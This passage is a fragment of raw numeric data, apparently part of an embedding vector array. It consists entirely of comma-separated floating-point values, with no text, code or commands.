60731503,-0.0020432011,0.0037663814,-0.009123912,0.0047951513,0.004137315,0.012481432,0.008096997,0.023159444,0.014109068,-0.026273256,-0.033218812,0.010227894,0.017132718,-0.011781367,-0.004975905,-0.01514855,0.011042232,0.019401954,0.008014454,-0.020276701,0.0076664845,-0.004971654,-0.0023507136,0.012450632,-0.0045781634,-0.004855836,-0.002982371,0.033291087,-0.046083003,-0.011444048,0.018891385,0.009215386,0.0056409664,-0.009699505,0.0058664693,0.008365092,0.01480287,-0.003009372,0.004310814,-0.0078123785,-0.013280122,0.04244415,-0.020321038,-0.00065672933,0.0120981885,0.0052908654,0.01753319,0.01523324,-0.0028536543,0.0035240848,0.022060014,-0.019421672,0.00053743244,0.0074602948,0.0007693576,-0.007468949,0.00046049219,-0.02341157,0.026223911,0.005933102,-0.010154977,0.020465452,-0.016709484,-0.032519504,0.013357138,-0.013548384,-0.020886319,0.00020436895,0.02248312,0.017500719,-0.004785963,-0.01202581,-0.021539861,-0.075600505,0.013664507,-0.021432137,-0.01700794,-0.006436237,0.006257243,-0.0036029983,0.022457633,0.045774378,-0.019131545,-0.004316437,-0.0029667488,-0.002404001,-0.004693339,-0.00006544674,-0.0041175145,-0.0058643343,0.016160646,0.012509862,-0.00015751732,0.0013561831,-0.0027893793,0.023977932,0.008991084,0.034506246,-0.0127353165,-0.014810936,-0.030177359,-0.023172757,0.01158032,-0.00079141645,0.01577567,-0.006346343,-0.008098678,-0.020004325,-0.004445463,0.004618671,0.00061414175,-0.013249863,-0.009857743,-0.023052063,-0.0022869406,-0.002486045,0.0377011,-0.009055681,-0.015826693,0.008430418,-0.0069619855,0.00032171188,0.0006576982,0.017247396,-0.010714838,0.012818989,0.014087437,-0.0022735193,0.021815155,-0.00037689638,0.0071898946,0.009209709,-0.000047146386,-0.0052030957,0.011921021,0.0041867425,0.014372563,-0.011781028,-0.0065121106,-0.009194408,0.02438586,-0.020499496,-0.01303054,-0.018905433,-0.018713014,-0.01739579,0.011328138,-0.008758373,0.037009005,-0.010786152,-0.007920481,-0.010627638,-0.024112755,-0.0185949,0.014914929,-0.031275265,0.0031783436,-0.03757009,-0.0020506133,0.0069515835,0.0031775432,-0.0050546075,-0.021999972,0.0054889475,-0.00009801161,-0.006730061,0.016458059,0.02307338,0.018315177,0.007789318,0.004122378,-0.0046333307,0.009502192,0.019528715,-0.01725365,0.006300251,0.045588113,0.0035139767,0.00073849416,-0.005426266,0.013592861,0.027236324,0.020344904,-0.00932241,0.0015405072,0.0036708477,0.005504839,0.026871879,0.0010100149,-0.019771054,0.0075855297,0.05256555,0.037945334,0.014449137,-0.014798302,0.023412934,0.009391428,-0.002705868,0.026454007,0.021875352,-0.011405199,-0.011676057,0.0042263893,-0.008518726,0.031554777,0.008007085,-0.010878368,0.008256275,-0.011462138,0.0013925188,-0.027270555,-0.017230213,0.0053511523,-0.011353863,0.01177028,-0.008998445,0.014228586,0.02176046,-0.027099919,-0.0031788973,0.011778423,-0.0018006304,-0.0043383385,0.009927779,-0.004060375,0.011416326,0.010365122,-0.0010262213,0.014560155,0.0144087635,-0.04274336,0.0012674279,0.00021530323,-0.010050007,-0.02247806,-0.0045801224,0.0008135543,-0.02778171,0.012574663,-0.01001699,0.0014272521,0.00082480424,-0.005594159,0.006864456,0.022818137,-0.006367776,0.032705866,0.0065443194,0.0006383553,0.017503476,0.02046594,-0.0004608524,0.00895897,0.0052465717,0.038437102,-0.0016034308,-0.0016289853,0.010841223,-0.014052844,0.011673118,0.0028443336,-0.03550025,-0.009564621,-0.008519504,0.004462523,0.0082799075,0.018452993,-0.014631184,0.04222962,0.02489892,0.014499952,0.008397199,-0.011127737,-0.01285319,0.022385499,0.021936944,0.025371535,-0.0033738334,0.009305164,0.019587183,-0.032752078,-0.005454385,-0.011815878,-0.003969813,-0.008751912,-0.003112406,0.007407808,-0.0099318,0.0015534319,-0.027843177,-0.003365085,0.0054872707,-0.01592055,0.010429148,0.012681168,0.025235318,0.009713602,0.010233006,-0.014142818,0.025353191,0.020276966,0.0035487597,-0.0220842,0.024169916,0.013816659,0.025062753,0.020534802,-0.028066399,-0.0020650844,-0.019348955,0.015736017,-0.00089209696,-0.0234888,0.0106237335,0.022104295,0.008696324,-0.008322398,-0.014183873,0.039612442,-0.0112765655,0.0008385846,0.0032021978,0.028638486,0.0034850657,0.0024921293,-0.0027486864,0.010792382,-0.006426787,-0.005154522,-0.015501187,-0.010967909,-0.017161744,-0.003574014,-0.006457206,-0.009316948,-0.011452701,-0.004805077,-0.009054237,0.00061478524,-0.0035934157,0.015649537,0.0038159792,-0.006401004,-0.0011140188,-0.0022509696,-0.004556288,0.016272614,0.009047366,-0.00024496668,-0.005772929,-0.0033942037,0.01063071,0.014298086,0.0089987805,0.0077875233,0.012656184,-0.031221168,0.001504563,0.033310916,0.019109799,-0.015780462,0.0059975735,-0.008846475,-0.015375545,-0.037369292,-0.0020845782,-0.0039739273,0.015208854,-0.0066527375,-0.012691008,-0.009581441,-0.01520263,-0.018733166,0.051124062,-0.016597534,0.0087733045,-0.008348449,0.005867919,-0.017429976,0.010298203,-0.00063930923,0.008816407,-0.00906368,-0.035858646,-0.035960183,0.0030207154,-0.027142141,0.018718267,-0.008514379,0.008285558,0.0038763713,-0.0044222497,0.023540955,-0.0002136001,0.0025745973,0.005814048,0.007115231,-0.0043776995,0.021793427,0.010005028,-0.016683418,0.0086240405,-0.024747526,-0.00037207632,-0.013831259,-0.0073926738,0.023631478,-0.0052547953,-0.0046393643,0.022324061,0.0017620655,-0.029389305,0.013190149,-0.005487151,-0.005788629,0.05442614,-0.005855675,0.008793388,-0.013417551,-0.020146558,-0.012246315,0.018384263,-0.02203344,0.014499205,0.0113939345,-0.02223904,0.01956147,-0.021346508,0.020241046,-0.0022996848,0.013383383,0.009550497,-0.0051160497,0.0076425443,-0.011524832,0.0010865347,-0.00016982139,-0.010540082,0.005262298,-0.012501201,-0.028874747,0.024733845,-0.0261823,0.020002285,-0.0062385905,0.0048174565,0.006967245,-0.012562795,0.0012737989,0.017710026,-0.010170642,-0.011254349,-0.01902628,-0.007399546,-0.00235909,0.016637344,0.021788036,-0.025075693,0.018645408,-0.0056717573,0.019175017,0.0725194,0.023102118,0.015507693,0.00614229,0.0015474462,0.020326726,0.013984618,0.020369215,0.0065827025,0.010453344,-0.019890077,0.01714046,-0.0024277929,0.012251013,0.022746667,-0.007741148,0.0052653984,0.0032604598,0.009382451,-0.0078010145,-0.0013608132,0.015277876,0.01055073,0.004771108,0.005303214,0.010536384,0.0063697873,-0.022182427,-0.006405668,-0.021695822,-0.011538374,0.017670553,0.015633887,-0.017199436,-0.003384986,-0.051678732,0.010424819,0.13045248,0.0077288453,-0.007236441,0.026752261,-0.0026627579,0.01711371,-0.11901329,0.012124044,0.00821051,0.00008575408,-0.005405445,-0.0009632517,-0.0051997947,0.030646639,0.0034756628,-0.01224645,-0.022025472,-0.0315209,0.023856215,-0.013095446,-0.0056746025,0.017463196,-0.0038257106,-0.0057463828,-0.036327373,-0.009540484,0.010833963,-0.015273007,-0.010922175,-0.014414725,-0.00065787474,0.0013786528,0.016904017,0.005398509,-0.029542135,0.0051040743,0.009097057,-0.006020123,-0.015334411,-0.020688022,0.0273106,0.014532885,-0.007823959,-0.021944005,-0.15948543,0.01208545,-0.0057951673,-0.052082147,0.009853625,-0.007903771,0.009363344,-0.0043980135,0.018776188,-0.013331366,-0.01380786,0.0299391,-0.01611093,0.0016587573,-0.011340236,-0.009363727,0.001067884,0.0054005925,0.008615703,0.0020035813,-0.0090272585,-0.00049302954,-0.01948919,-0.01395431,-0.00718553,0.0035646323,0.009865588,0.01831383,0.020548165,-0.002713011,-0.0021608653,-0.0141239725,-0.0143554015,0.0110683255,-0.004345319,0.0034056818,-0.010776477,0.018208569,-0.015191925,0.013976829,0.010956375,-0.0039202403,0.00024837287,0.005423866,-0.0015905306,0.030347321,-0.0010389495,0.00053224387,0.01966013,-0.0016573507,0.023033058,0.0053323475,-0.024085736,0.007337023,-0.002570073,-0.010335279,-0.013996623,-0.033713613,-0.020749766,0.0072542583,-0.0049674776,-0.010642828,-0.020039264,-0.006145335,0.025639705,-0.01629528,0.02070353,-0.03361954,-0.007873764,0.011262674,-0.010900638,0.0026412893,-0.0020866627,-0.02169063,0.014759408,-0.00034555534,-0.01486326,-0.0062322584,0.0257438,0.000060294846,0.0052082934,-0.035300106,-0.0010540533,-0.038702395,0.0044740066,-0.00936911,-0.021431578,-0.003430717,-0.014989077,0.017456826,0.024430513,-0.013673668,0.012929559,0.014441664,0.031879026,0.0011532588,0.040820878,-0.015955409,-0.03198317,0.0020366262,0.0062398906,-0.019143663,-0.030619264,0.018220926,-0.020266172,0.005498222,-0.025867699,0.0055459,-0.027067715,0.007511762,-0.0038100465,-0.0061565996,0.008687585,-0.008035584,-0.026869616,-0.014138899,0.0026787072,0.0048042815,0.005703599,0.010078664,-0.024862666,0.005346542,-0.010359609,0.011745762,0.03392814,0.012701578,-0.023274535,-0.015645783,-0.013585126,0.031993434,-0.043568198,0.019183261,-0.00017862918,0.0047123483,-0.030219978,-0.0010386567,-0.018132651,0.023319494,-0.04468668,0.0012653276,-0.006352844,-0.009042935,-0.015651865,0.0111053465,0.004879438,-0.018937876,0.03883473,-0.028725887,0.012976943,0.000012263054,-0.0009920753,0.016795157,-0.014860904,-0.020942286,0.01875001,0.058613524,-0.015753338,-0.015653495,0.021716604,-0.0030740919,0.012671502,0.0049958318,-0.009082715,-0.011362323,-0.01657463,-0.010532728,-0.017072665,0.0006703322,0.009835158,-0.025428658,0.010488996,0.0014838345,0.012195285,0.0067652436,0.012171295,0.020783143,-0.022960423,-0.010299963,0.030345973,0.012957316,-0.0022118671,0.0053493013,0.016741332,-0.011657614,-0.0062982244,0.00040033343,-0.014846875,-0.010099497,0.016350614,0.010968683,-0.033092372,-0.024923306,0.007886934,0.008285615,-0.010461359,0.005194459,-0.0048781177,0.016835047,-0.021227485,0.026349666,-0.025816372,-0.029037796,0.00648649,0.0060571968,-0.011413751,-0.0000132351015,0.009422587,0.002263196,-0.012546884,-0.027690895,-0.0099047525,-0.0005841295,-0.008721082,-0.006844733,-0.021350615,0.036289725,-0.011310719,-0.039701127,0.0039207577,-0.008231991,0.026227407,0.013316801,0.02047421,0.0046316767,0.012861134,-0.005125132,-0.034346882,-0.01644048,0.0060681365,-0.0048353476,-0.0068976404,-0.02574783,0.0037616757,-0.016904406,0.010577514,0.02138969,0.02263506,-0.009185526,-0.0018143621,-0.025256826,-0.040881913,-0.008422663,0.038318485,-0.007869608,-0.0046263956,0.0074588815,0.01918411,0.025431244,0.0005218342,0.009610799,0.009227887,0.017381154,0.0053795795,0.019024694,0.00052928115,0.027414136,0.008910532,0.0020840452,-0.0032336172,0.011200068,-0.022829603,0.004765056,0.004732043,0.021864923,-0.01190526,0.0032872527,-0.029278355,0.014339297,-0.031468693,-0.011995505,0.05807266,-0.0150102675,0.0134252105,0.033975385,-0.016104562,-0.021292329,-0.001702439,0.017995412,-0.0030343742,0.033515267,-0.00076752686,0.017323866,0.007050517,-0.033847094,0.042632103,-0.011726973,0.026331449,0.0124079315,0.0068519204,-0.020245474,-0.02975993,0.017381957,0.0011487537,-0.008815085,0.018261248,-0.018537499,-0.008786792,-0.005821804,0.008700408,0.0045117834,0.0167636,0.013007124,0.008067253,-0.040607493,-0.0070504285,-0.022923028,0.021679567,-0.009590376,0.0058027823,0.007551635,0.007690772,-0.018923333,-0.013290494,-0.017137673,-0.014385751,-0.017982807,0.05119983,-0.0013634141,-0.003958113,-0.02434588,0.021880565,0.026604846,-0.00455281,0.01993299,0.00031000833,0.001217158,-0.012587653,0.00801806,-0.0034152523,0.013545214,0.00085211225,-0.0009417965,0.0034554184,-0.013040939,0.0015427897,0.012758429,0.007683318,-0.020197317,0.0069969627,0.006215009,0.018181527,0.0040502003,0.022470882,-0.0019012535,0.014790629,-0.021414991,0.009123289,-0.0037478125,-0.0070056445,-0.03516375,0.002115931,0.035134874,-0.032010768,-0.0042723953,0.01245242,0.00078881293,0.014445575,-0.012741229,-0.025549522,-0.0060214135,-0.005669476,-0.016150413,-0.024985716,-0.0011391605,-0.013303526,-0.012511629,0.01584552,-0.0065964754,0.0067277816,0.009706356,0.010429834,0.011115595,0.023712946,-0.0017345278,-0.033131193,0.0008536714,-0.0032260157,-0.0012706643,0.01491118,0.016260097,0.008365992,-0.026275247,0.052807212,-0.014815953,-0.001965214,0.008410671,0.029568015,0.024501884,-0.003989591,0.006943454,-0.025551729,-0.011494945,-0.0365712,-0.04465296,0.023462169,-0.0003897246,-0.025710857,-0.008179092,0.016943967,-0.010410564,-0.008799993,0.015382702,-0.012779754,0.0036415008,0.025687724,0.0096083945,-0.003512711,-0.024764081,-0.019553056,0.025906397,-0.035236545,0.0075899903,0.0032096172,-0.016767047,-0.026134964,-0.009357165,0.0033763298,-0.019479595,0.0073636873,-0.0036587736,0.019572612,-0.009198296,0.025342125,0.013217983,-0.0040923473,0.012487298,-0.006519061,-0.015531957,0.015076967,0.004621216,-0.0066198586,0.008120872,-0.025352282,0.014780698,0.009683063,0.01963925,-0.009927516,0.01702854,0.009678569,-0.0007919927,0.0095639825,0.022323964,0.009933362,-0.009396931,-0.0388336,-0.026904076,0.018697381,0.010231692,-0.031054322,-0.02489697,0.0006406916,-0.009378331,-0.028576298,0.012328398,0.010839509,0.01744846,0.005798519,-0.021409154,0.016409671,-0.012980254,-0.004507058,0.019797867,0.014203218,0.009914194,-0.013190591,-0.016723521,0.024721399,0.017493935,0.0003524387,0.01439392,-0.01622149,0.02526793,0.03694776,0.011529339,0.011725308,-0.00035803823,-0.007930648,-0.0065036356,-0.009822894,-0.029755123,0.016601345,-0.02552486,-0.00949152,-0.015482938,0.0012690917,-0.0015958181,-0.01595584,0.00784892,-0.09582654,0.0057818876,-0.034452274,-0.018206,-0.01486525,-0.00617859,0.017344423,0.023066448,0.0037572861,-0.019239742,-0.0044281506,0.015202203,-0.004698486,-0.0040691546,0.005710027,-0.0067372234,-0.021716017,-0.010253643,-0.017469388,-0.003851909,0.01649985,-0.020842193,-0.0013729569,-0.014587364,-0.010426535,0.0051521347,-0.0036364712,0.012408147,0.010612128,-0.016009798,-0.0013957943,-0.009224102,0.0073604803,0.020612324,0.0014639714,-0.00091875234,-0.00075318076,0.00557435,0.0015386009,-0.0040721227,-0.0018030009,0.023522034,0.004116344,0.0022648862,0.010026339,0.016943822,0.006407699,0.021744195,0.028851913,0.03504478,-0.0048973644,-0.019667031,0.003026598,0.006598814,-0.0075317966,-0.01967514,0.01307423,0.0031303756,0.0065672062,-0.004311337,-0.000840476,0.010845689,0.0033576083,-0.017050989,0.010092883,0.005394106,0.016071927,0.005513849,-0.027357668,0.0004903306,-0.0057403017,0.027772142,0.0021574958,0.0027138812,-0.003582197,0.01945354,0.0036582788,-0.0042434824,-0.0047940863,0.030950239,-0.034178313,-0.010974864,0.0026937749,0.024908004,-0.014287762,-0.022100221,0.004104452,-0.0018891246,-0.014072367,0.015056213,0.009442946,0.0050717313,-0.0037370163,-0.021879563,0.0060748514,0.0048591136,0.0008879732,0.0008741822,-0.009381089,0.008217435,0.0025441137,-0.0021265321,-0.0018092764,-0.019304236,-0.102979615,-0.0017550132,0.01517667,-0.009461379,-0.007067845,-0.0018028881,0.008123503,0.0037808695,0.046095796,0.02207984,-0.025713371,0.0025849664,-0.001996025,-0.0074198702,-0.0006779053,0.018018585,-0.024841538,-0.0052168234,0.005753088,-0.023591695,-0.0053495932,-0.0020558676,-0.013177347,0.011806491,0.004974576,-0.0053167506,0.0031026,0.02149338,0.019067569,-0.012329722,-0.0063884817,-0.0023962941,0.009450217,0.008247897,-0.037286796,-0.008542909,0.01538676,-0.02419164,-0.0025122308,0.015088623,0.012933273,-0.007100659,0.027771913,0.0067399023,-0.008736082,-0.005939878,-0.012902695,0.011958033,-0.010311887,-0.008077828,-0.00984273,0.010917821,-0.00005972739,-0.0023416383,-0.021464247,-0.025524048,0.0017134821,0.02512287,-0.0014885559,0.010786545,0.007432583,0.0052840617,-0.019955246,0.020930676,0.0015225417,0.007812472,0.0091828145,0.036694124,0.0010012253,0.013492862,0.003234146,0.023568595,0.0025923809,-0.014864263,0.021147935,0.011751568,0.022749884,0.028385915,0.020149002,-0.013701172,0.01568189,-0.017371666,0.0025211505,0.017006986,-0.013758403,0.0048864065,0.0033774811,0.0026870847,-0.009500854,0.005624115,0.0016254004,0.018325526,-0.017384838,0.015028641,0.035415575,-0.0014123735,0.044104744,-0.014656309,-0.009356828,-0.011854161,-0.034358557,-0.02426898,-0.025908757,-0.0020830152,-0.029913398,-0.0043061757,0.022081323,0.007866652,-0.009178497,-0.012587065,0.0022146183,0.022713829,-0.022085182,0.0012565505,0.011485682,0.014981515,-0.02383297,-0.01779622,0.0007065593,-0.015564446,0.0049171154,-0.005965878,0.00066220196,-0.01863072,-0.015619685,-0.019469695,-0.01843943,0.027572157,0.010601059,-0.031541508,0.006363679,0.010180647,0.018181365,-0.027463127,0.007826195,0.006855937,0.0047507337,-0.003975707,-0.014640517,0.015854608,0.018731529,0.0065647964,0.0051464154,-0.0051105614,-0.006708037,-0.005767235,-0.0043540616,-0.019148264,-0.021101015,0.0055220695,-0.018695775,-0.01909483,0.021731501,0.031718392,-0.00033717437,0.009308699,-0.022628438,-0.006016559,-0.02264841,0.0075200177,-0.022437733,0.008068066,0.017153397,-0.01761895,-0.017044617,-0.022877917,-0.008057999,-0.0009294984,-0.0010182533,-0.011097869,-0.007991844,0.0008710627,0.007815124,-0.038727015,0.01911459,0.02376875,0.007222025,0.023033164,0.022664515,0.026620548,-0.016413981,0.00002432158,-0.0019762686,0.0071855932,0.014135663,0.019966627,-0.003494158,0.0031920364,-0.004098543,-0.010619974,0.06850992,0.013680988,-0.026991673,-0.025296664,0.0024828126,-0.0010679455,0.003971826,0.012057525,0.008304515,-0.007003697,-0.003506594,0.014132959,-0.000855942,-0.0026533182,-0.00037638552,0.002601289,0.00058709725,0.018726088,0.0125482315,-0.0056555015,-0.010176073,0.003553033,-0.021818802,-0.009659491,0.009952452,0.013666757,-0.0072945417,-0.010809673,-0.00004353327,0.01521965,0.0071899174,-0.034067295,0.015657436,-0.009348563,-0.013246558,0.024523163,0.009232059,0.016230054,-0.01804616,-0.0054144035,0.015620346,0.0020365773,-0.024580626,-0.006098946,0.024170788,-0.004696335,0.018767886,0.007603122,0.009037862,0.03078923,0.027564397,0.02846438,0.01700666,0.010165675,0.004436031,0.005872615,0.013105939,0.009741273,0.010958798,0.04792548,-0.0028993415,-0.0153677305,0.002763846,-0.02409939,-0.015933417,-0.009282203,0.0071351714,0.01325342,0.0018732147,0.020818826,-0.005743814,0.0077938903,-0.01837689,-0.004447454,0.0095556285,-0.0021736156,0.009257152,-0.023934705,0.006502495,-0.005675872,0.028815068,-0.0011735215,-0.0029846672,0.016403567,0.0039441865,-0.008777641,-0.014355343,-0.0016483471,0.020472612,0.0026063146,-0.0085392,-0.01685965,-0.0073283184,0.020756409,0.009567359,0.016325887,0.015790282,0.009650695,-0.012269114,-0.007745284,0.0020487679,-0.00052132615,0.012849338,-0.00648714,-0.016289774,-0.007818764,0.010197022,0.00015270621,0.020434417,0.015094916,0.027033305,-0.012285878,0.002617957,-0.011401503,0.028877791,-0.016081123,-0.0022667274,0.01091991,0.004204151,-0.020259866,-0.02423187,-0.0051269643,0.0059353407,0.0016264613,0.003876258,0.021761497,0.000222311,0.0025104403,-0.04675562,-0.015933635,-0.006644213,0.01062778,0.007105243,-0.0017509776,0.006288119,0.0019780342,0.0035004092,0.023183415,-0.014810424,0.0040641758,0.017374352,-0.015490877,-0.001269987,0.00021492082,0.02460478,0.013311705,0.0108566405,0.023453703,-0.0095218625,0.012565012,0.0060864077,0.0005485457,-0.016830057,-0.008747551,-0.0027968015,0.019527068,0.0065764785,-0.0082354,-0.0019007538,0.0015070608,-0.010709492,-0.009754182,-0.0033202972,0.0026968394,0.0049052034,0.033773575,-0.032112967,0.0058149197,0.019625133,0.002029981,-0.016923172,0.013504858,-0.008177162,-0.0069374917,-0.0042876666,-0.0056463443,-0.025289748,0.005629368,-0.022324787,0.012890491,-0.0044320743,0.0042181774,-0.017208708,-0.009672363,-0.0014504453,-0.09846465,-0.0060693733,0.0018771337,-0.0020146088,0.0375317,0.0034438376,-0.0076935207,-0.010466999,-0.012827757,0.034085006,0.013616012,-0.007971053,-0.012744551,0.00006415725,0.009439524,0.008028739,-0.023709742,0.005817729,0.010523581,0.0012107689,-0.007412512,0.018121853,-0.00417224,-0.017398626,0.008241752,0.005246225,-0.009840371,-0.0036973462,-0.0122127235,0.008003822,-0.01813866,-0.009982977,0.0074053123,-0.007774646,-0.0022674932,-0.001967583,-0.008904138,0.009309854,-0.0131166745,-0.03919957,-0.0029834278,0.0069982684,-0.013718902,-0.019185262,-0.0036102177,0.021952711,-0.041688424,-0.001032576,-0.012234799,0.0032675457,-0.0005531874,-0.0076973354,-0.0100158,0.023538673,0.010141772,0.006807632,-0.0020743161,0.002789567,0.040226277,0.0006254287,-0.025333697,-0.0057986444,0.011845759,-0.0023608299,-0.005349719,0.01609155,0.005365814,0.007798479,-0.0025567429,0.005283585,-0.00460933,-0.0041911514,-0.011830131,-0.034952313,0.004655946,-0.00048203015,0.00024579957,-0.008305024,0.011697402,0.019353982,0.056777526,-0.015360852,0.020603508,0.017468221,0.01712233,0.011586313,-0.006381392,-0.0030612063,0.030173918,-0.009523517,0.005269762,-0.008168523,0.0538117,0.017714376,0.0055905655,0.009249379,0.003805377,0.008874662,0.002033067,0.006859547,-0.0041841087,0.0054061273,0.0034262792,-0.012654262,-0.017480016,0.0001444564,-0.005372127,-0.00847638,-0.010796387,-0.0010278368,-0.0019629067,0.027903957,0.02334228,0.028654037,0.0034347363,-0.0005614716,0.01605726,0.020123819,-0.016504286,-0.027927166,-0.023931826,-0.00618113,-0.0070848665,0.030008541,0.017976953,-0.004390036,0.0051906584,-0.0027193737,-0.01977387,-0.0037790826,-0.0043065706,0.03674748,0.007966784,0.00036690859,-0.0110906,0.010778348,-0.022066122,0.014395918,0.00910293,0.033443466,-0.013299381,-0.040899366,-0.0010532809,0.007284406,-0.016433368,0.026637875,0.0018427046,-0.0013970628,0.01222271,-0.011900426,-0.0030235029,0.0017672019,-0.0034478782,0.006508608,-0.009804305,0.0061788987,-0.0021170531,-0.0031527502,-0.018262092,-0.0034826135,-0.00048157922,0.00069058785,-0.0013791845,-0.00821937,-0.02755859,0.023152402,0.016564503,-0.013538676,-0.013183489,-0.0009997508,-0.0068211383,-0.0071817255,0.0060904115,0.0028133201,-0.020104833,-0.00026714514,0.030375894,-0.003194822,-0.00520214,-0.018573912,-0.005750251,-0.010675747,-0.0049416656,-0.05142481,-0.0019983817,-0.007883497,-0.0061418377,-0.011300343,0.010711532,-0.0014141352,0.007333997,-0.00760873,-0.0027096493,-0.014121859,-0.0003535153,-0.018986592,0.0061692772,0.0019076512,-0.0022569236,0.0075400146,-0.010398243,0.0014184368,-0.0071895723,0.0022916582,0.0350875,0.008588585,-0.013755176,0.009407669,-0.023207396,-0.0124511095,-0.0059091533,0.0010188528,0.016627805,0.09785361,-0.0012154956,-0.016289098,-0.004698606,0.021404307,-0.0027252298,0.01668354,0.009175811,-0.00879185,0.001570594,0.03871256,-0.014470023,0.01137924,-0.017284768,-0.02124389,0.016407222,0.014256016,-0.04061356,0.007044295,-0.008071681,0.03875116,-0.016763989,-0.024814056,-0.040554225,-0.024004638,-0.059843533,0.04803572,0.02080016,0.0056493473,0.023339868,0.010635306,0.011530874,0.0009782121,0.02199648,-0.00899985,0.019188536,0.0009049658,-0.015715115,0.0027329565,-0.010249623,0.027935797,-0.006465076,-0.020835638,-0.0025912318,0.011456964,-0.0102155525,0.0006536613,-0.016748639,0.014119517,-0.025716698,0.0067388853,-0.008965891,0.011429846,0.0064059133,0.011106969,-0.008178208,0.008751424,0.00047228183,0.007769353,0.0030201806,0.0027672814,0.0138851,0.013151047,-0.0011253138,0.007043125,-0.00086677173,-0.02397035,-0.029892905,0.014410179,-0.000083002444,0.01222447,-0.026199756,-0.0022909425,-0.0007326643,-0.0055388827,0.022682974,-0.01416835,-0.011365534,0.016627317,0.004988417,0.0019936757,-0.0006217271,0.012603076,-0.006142662,0.011387931,0.011252186,-0.008611615,0.008021734,-0.003418198,-0.00010250669,-0.007146741,0.02848924,0.021501832,0.006089913,-0.0032022302,-0.0066962806,0.018451663,-0.004651632,0.0009001491,-0.010597108,-0.022599684,0.0076357364,0.0045626997,0.008485519,0.0009887606,0.00097007153,0.013381943,0.026694484,0.012127826,0.00031375693,0.0027988122,0.016135683,0.023825442,0.0022868684,-0.011956187,0.02636878,-0.026520064,-0.0065531502,0.032332186,-0.010707361,-0.022689112,0.015438156,0.0119705815,0.04407548,0.005844462,0.03247838,-0.0071167285,0.0016690929,-0.010947671,0.00043613484,0.015498763,-0.01590622,-0.00445418,0.029668376,0.008265244,0.0026862056,0.02698458,-0.0071575036,0.009822049,0.022517717,0.008814281,-0.022830684,-0.0021352768,-0.008302342,0.019244986,-0.026195586,0.022108946,-0.006331721,0.0086572245,-0.008784148,-0.0003024458,0.0018727923,-0.009930866,-0.0035501982,-0.0050806785,-0.012502472,0.0072075864,0.009607926,0.0019959505,-0.018526902,0.0025375914,-0.006259887,-0.006977327,-0.04364524,0.029857019,0.026379231,0.0065406137,0.008020481,-0.000030144112,0.012603312,-0.019080391,0.0042565204,-0.0058099492,-0.008643095,-0.02416023,0.017026965,0.011260689,0.0024985203,-0.0031334283,0.0053032013,-0.0050376873,0.00051644794,-0.015549971,0.008879493,0.010526885,-0.010680337,0.0019579367,0.00017035648,-0.01913965,0.014853201,0.00022685979,0.012546158,0.009237865,-0.01044149,-0.020153759,0.009759527,-0.029091438,0.03983689,-0.025170248,-0.044661053,-0.0052717137,0.0039150123,0.009633988,-0.019679235,0.009734809,-0.011040308,0.009826298,-0.022960925,-0.009576108,-0.015517374,0.009736571,0.0022526563,0.0012351025,-0.026499402,-0.0075458703,-0.003914555,-0.012321032,-0.017388381,0.0053424677,-0.008066119,-0.0032015394,0.00039244752,-0.005999392,-0.019099712,-0.0048301127,-0.017064,-0.009014008,0.016383808,0.0149015365,-0.025695387,-0.009691833,-0.00069695216,0.0056442944,0.003207114,-0.001861861,0.004925359,0.018907512,0.014363417,0.006649833,-0.0067745815,-0.0022971125,0.008575671,0.025285834,0.0016477811,-0.011550362,-0.003916569,-0.008018537,-0.028338615,-0.0006388075,-0.008680498,-0.038154498,-0.00018111434,-0.03285723,-0.033281248,-0.017564312,0.01826378,-0.0065693175,0.027829152,0.008987705,-0.0029231936,-0.0015142731,0.016931111,-0.0013612799,0.01338059,-0.004686225,0.002692026,0.0157016,-0.02396669,-0.01067643,-0.0024882602,0.0052284137,0.011947216,-0.006016599,0.01091794,0.011312549,0.0051455763,-0.008439588,-0.027727712,-0.002580707,-0.0070995134,0.004755802,-0.0069735693,-0.0035606802,-0.027597805,-0.009846501,-0.0069813626,-0.014954102,0.028210906,0.03526921,-0.05170836,-0.010661065,0.012479291,0.011376461,-0.027045276,0.03143862,-0.013121875,-0.032900132,-0.035979636,0.015751736,0.0004983911,-0.009758738,-0.038535777,-0.014003653,0.0054156017,-0.019857846,0.0014950356,0.011999692,-0.005342904,-0.024669394,-0.0025727928,-0.002803546,-0.0005295629,-0.016673734,0.013221101,0.0069095567,-0.0077001886,0.014919755,0.0005743884,0.019832864,0.013650511,0.0080148075,-0.03320535,-0.0071157734,0.0022456697,0.00082235894,0.012562765,-0.004469238,-0.034562267,-0.023973437,-0.0042382013,0.010286229,0.016735598,0.022970615,-0.017154014,-0.022003636,0.008474418,0.0068958164,0.14386635,-0.0030416623,-0.0008189437,0.013301963,0.0033310323,-0.0042619766,0.012229325,0.011574396,-0.0028628397,0.018176638,0.009379659,0.0040109158,-0.015032586,0.025412485,-0.009429485,0.00450831,0.015997576,0.12276399,-0.008591927,0.03145404,0.016477518,0.0011584065,0.01847241,0.012685994,0.007231494,-0.07773338,0.0139641,-0.030106973,-0.0061192894,-0.00023832591,-0.03967498,-0.0073157246,0.008864509,0.01257178,-0.005994888,0.012187296,-0.009488699,0.0018402361,-0.012492056,-0.0022205433,0.003361899,0.00074014626,-0.014647919,0.011146852,0.0022963467,0.011497006,-0.02311823,0.008958891,-0.007882172,0.01683387,0.03406248,-0.010142762,0.021482142,-0.010698855,0.0039318376,-0.0039729653,0.0035892783,-0.00085676886,-0.039599437,0.015929636,0.0022778285,0.003026766,-0.013575828,0.019686665,-0.017539684,-0.0034993594,-0.024144333,0.0073434063,-0.0067340783,0.015122963,0.020107165,0.003909857,-0.010785828,-0.00070168416,0.030068202,-0.008154147,-0.015880467,-0.005502131,0.015513236,-0.00850413,0.021247467,-0.00036486966,-0.0056735957,-0.003731771,0.013728677,0.016928801,-0.006273254,0.017744461,0.03503573,-0.0027067128,-0.0066699944,-0.0067975656,-0.007155201,0.021138126,0.0074452357,0.038430072,-0.0045860624,-0.0052154013,0.00228318,-0.0025935892,-0.012269398,0.023665192,0.021803528,-0.0050153853,-0.0048170853,0.011587776,-0.011799507,-0.018867977,-0.026555348,0.00052071357,0.010926396,-0.023666462,-0.004841764,0.021274228,-0.022436598,-0.0072272043,-0.00069410243,0.012078953,-0.029961811,-0.0033423135,0.0012281163,-0.010740193,0.0013285512,0.0057576224,-0.027976839,-0.0013139258,0.023262007,0.025857598,-0.004453276,-0.016001971,-0.011460691,0.0009029045,0.007285468,0.045695815,-0.0035250774,-0.011365639,0.029794564,-0.041560322,-0.018550863,-0.0074322615,0.008807049,0.010389046,0.0055846833,0.008453686,-0.015557712,-0.0023695638,0.020586979,-0.0046387883],[-0.014639159,0.